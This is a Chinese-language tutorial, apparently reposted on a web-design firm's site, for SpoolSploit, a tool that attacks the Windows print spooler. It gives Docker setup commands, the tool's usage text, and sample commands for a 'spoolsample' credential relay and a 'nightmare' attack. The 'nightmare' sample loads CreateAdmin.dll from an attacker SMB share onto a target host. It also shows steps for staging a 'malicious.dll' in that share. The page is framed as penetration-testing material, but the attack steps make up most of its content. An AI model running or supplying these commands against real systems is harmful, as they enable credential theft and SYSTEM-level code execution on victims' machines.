如何使用SpoolSploit审查Windows打印后台处理程序的安全性

关于SpoolSploit

SpoolSploit是一款针对Windows打印后台处理程序(print spooler)的安全审计工具,广大研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。

SpoolSploit中还封装了很多其他的实用工具,以便进行实际的漏洞利用和渗透测试。并实现了两种方法来中继计算机帐户凭据,以升级权限并在具有完全系统访问权限的节点上执行恶意DLL。

快速开始

自该项目发布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功测试。

我们建议广大用户在SpoolSploit Docker容器内执行渗透测试或凭据中继测试,并托管相应的DLL文件,然后确保运行Docker容器的主机上开启并未使用的445端口。在Windows主机上运行此容器时,这种情况最为普遍,因为默认情况下它使用的是端口445。如果你的主机上端口445已被占用或无法使用的话,可以在网桥模式下配置了网络适配器的虚拟机中运行Docker容器即可。

(1) 工具下载&访问SpoolSploit容器

首先,使用下列命令将该项目源码克隆至本地:

 
 
 
    
  
  
  
  1. git clone https://github.com/BeetleChunks/SpoolSploit 
    2.

接下来,构建SpoolSploit Docker容器镜像:

 
 
 
    
  
  
  
  1. cd SpoolSploit 
    2. 
  
  
  
  2.  
    3. 
  
  
  
  3. sudo docker build -t spoolsploit . 
    4.

创建并启动SpoolSploit Docker容器:

 
 
 
    
  
  
  
  1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest 
    2.

绑定容器:

 
 
 
    
  
  
  
  1. sudo docker exec -it spoolsploit /bin/bash 
    2.

(2) 命令行使用

 
 
 
    
  
  
  
  1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD 
    2. 
  
  
  
  2.  
    3. 
  
  
  
  3. optional arguments: 
    4. 
  
  
  
  4.  
    5. 
  
  
  
  5.   -h, --help               显示帮助信息并退出 
    6. 
  
  
  
  6.  
    7. 
  
  
  
  7.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} 
    8. 
  
  
  
  8.  
    9. 
  
  
  
  9.                         需要在目标主机上执行的测试类型 
    10. 
  
  
  
  10.  
    11. 
  
  
  
  11.   -rH RHOST, --rhost RHOST 
    12. 
  
  
  
  12.  
    13. 
  
  
  
  13.                         远程目标IP、CIDR范围或文件名 (file:
    14. 
  
  
  
  14.  
    15. 
  
  
  
  15.   -rP {139,445}, --rport {139,445} 
    16. 
  
  
  
  16.  
    17. 
  
  
  
  17.                         远程SMB服务器端口 
    18. 
  
  
  
  18.  
    19. 
  
  
  
  19.   -lH LHOST, --lhost LHOST 
    20. 
  
  
  
  20.  
    21. 
  
  
  
  21.                         监听主机名或IP地址 
    22. 
  
  
  
  22.  
    23. 
  
  
  
  23.   -lS LSHARE, --lshare LSHARE 
    24. 
  
  
  
  24.  
    25. 
  
  
  
  25.                         SMB共享 (UNC) 
    26. 
  
  
  
  26.  
    27. 
  
  
  
  27.   -d DOMAIN, --domain DOMAIN 
    28. 
  
  
  
  28.  
    29. 
  
  
  
  29.                         身份认证域名 
    30. 
  
  
  
  30.  
    31. 
  
  
  
  31.   -u USER, --username USER 
    32. 
  
  
  
  32.  
    33. 
  
  
  
  33.                         身份认证用户名 
    34. 
  
  
  
  34.  
    35. 
  
  
  
  35.   -p PASSWD, --password PASSWD 
    36. 
  
  
  
  36.  
    37. 
  
  
  
  37.                         身份认证密码 
    38.

工机使用样例

使用样例1:

 
 
 
    
  
  
  
  1. python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 
    2.

使用样例2:

 
 
 
    
  
  
  
  1. python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 
    2.

SpoolSample - Windows设备账号凭证获取和中继

 
 
 
    
  
  
  
  1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ 
    2. 
  
  
  
  2.  
    3. 
  
  
  
  3. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' 
    4.

工具使用截图

项目地址

SpoolSploit:【GitHub传送门】

网站题目:如何使用SpoolSploit审查Windows打印后台处理程序的安全性
本文链接:http://www.csdahua.cn/qtweb/news41/443641.html

网站建设、网络推广公司-快上网,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 快上网

成都快上网为您推荐相关内容

网站内链知识

同城分类信息

成都网站设计    营销型网站建设    Android开发    重庆企业网站建设    成都定制网站    买友情链接    网站建设    盐亭做网站    网站排名优化    重庆主机托管    西部信息机房    温江做网站    江油做网站    沃尔沃发电机出租    梓潼网站制作公司    成都小程序开发    崇州搬家公司    微信小程序    成都网站设计    主机托管